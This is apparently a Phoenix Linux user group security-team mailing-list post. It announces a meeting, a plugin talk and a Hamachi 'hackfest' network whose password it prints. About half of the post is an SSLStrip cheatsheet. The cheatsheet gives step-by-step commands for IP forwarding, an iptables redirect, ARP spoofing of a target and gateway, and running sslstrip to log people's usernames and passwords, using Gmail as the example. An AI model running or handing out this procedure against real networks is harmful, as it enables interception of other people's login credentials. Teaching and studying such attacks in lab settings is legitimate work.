Next PLUG Security Team Saturday Noon - 15:00 Gangplankhq.com http://plug.phoenix.az.us

Hayst.ac Firefox Browser PlugIn

David Huerta will be showcasing hayst.ac - his Firefox Security Plugin; just one of the many Haystack Projects:

After arriving in Arizona from the posh, cosmopolitan enclave of southeastern Idaho, David founded the DeVry Linux User Group (DeLUG) in 2003, an originally student organization that drew members and activities from the greater West Valley Free software community, including students at GCC and ASU West. He is also the founder of Hayst.ac, a web history obfuscation system, and serves on the board of directors for HeatSync Labs, a hackerspace in Chandler.

Hamaci/LogMeIn HackFests

Saturday 19th of January, 2011, Hamachi network hackfest:
DO NOT CONNECT TO THIS NETWORK UNLESS YOU ARE CERTAIN OF YOUR SECURITY!
hackfest password = trustme
Hackfest ends on Sunday at 22:00. Have fun!

If you bring your laptop to open hackfest labs and join any fest network (plan on being able to use live CDs, or USB jump drive) you might want to disable the hard drive . Using gangplank's open network, Wifi is unlimited for researching and acceptable use shared community access (no cracking).

Other Work:

Rebuild old Linux system (with radius for enterprise-WPA2) into gPXE for imaging (Just like we did for Installfest):

Add a puppet cfengine process to maintain our configuration files even after <s>edited</s> hacked.

Just Like Farengi - We Like to BE PREPARED:

# SSLStrip CHEATSHEET

OVERVIEW:

Requirements

    * Python >= 2.4 (apt-get install python)
    * The python "twisted-web" module (apt-get install twisted-web)

Setup

    * tar zxvf sslstrip-0.5.tar.gz
    * cd sslstrip-0.5
    * (optional) sudo python ./setup.py install

Running sslstrip

    * Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
    * Setup iptables to redirect HTTP traffic to sslstrip.
(iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
    * Run sslstrip. (sslstrip.py -l <listenPort>)
    * Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

Thanks to Moxie MarlinSpike

https://www.blackhat.com/html/bh-dc-09/bh-dc-09-speakers.html#Marlinspike

STEP X STEP (for those who need it slower):

# Proxy Preparation

    * First verify routing and nat;

    # cat /proc/sys/net/ipv4/ip_forward

    * 0

    # echo 1 > /proc/sys/net/ipv4/ip_forward

    # cat /proc/sys/net/ipv4/ip_forward

    * 1

    # /sbin/iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

# Start MITM

    * Arpspoof addresses to default interface gateway (and target machine)

     # arpspoof –i eth0 –t 192.168.1.231 192.168.1.244

# SSL Strip

    * Start SSLStrip:

    # ./sslstrip –l 8080

* Open Browser  -  Go Login to SSL https://Gmail.com (for instance)

# tail –f sslstrip.log

You will log the name:password pairs for each site visited from the proxy.

As you can see, the default gateway and target machine can be seasoned to taste.

./sslstrip -h

------------------------------------end SHEETCHEAT

 http://www.obnosis.com

Catch My MetaSploit & IP CAM Surveillance
Presentations @ ABLEConf.com in April!

















--
(503) 754-4452
(623) 688-3392

Next PLUG Security Team Saturday Noon - 15:00 Gangplankhq.com http://plug.phoenix.az.us


 http://www.obnosis.com
Catch My MetaSploit & IP CAM Surveillance
Presentations @ ABLEConf.com in April!